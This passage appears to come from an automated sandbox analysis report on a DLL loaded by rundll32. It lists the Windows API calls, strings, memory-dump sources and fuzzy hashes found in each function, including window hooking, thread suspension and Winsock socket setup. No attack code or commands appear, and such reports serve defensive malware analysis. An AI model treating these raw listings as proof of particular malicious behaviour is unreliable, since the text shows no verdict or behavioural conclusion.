                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction ID: f69531b56b144151f4c46f4c2f1acf85afd3bdedcb4b37807a4dae52f16cbedc
                                                                                                                      • Opcode Fuzzy Hash: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction Fuzzy Hash: AD817171D002699FDB10DFA5DD44AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                      • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                      • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
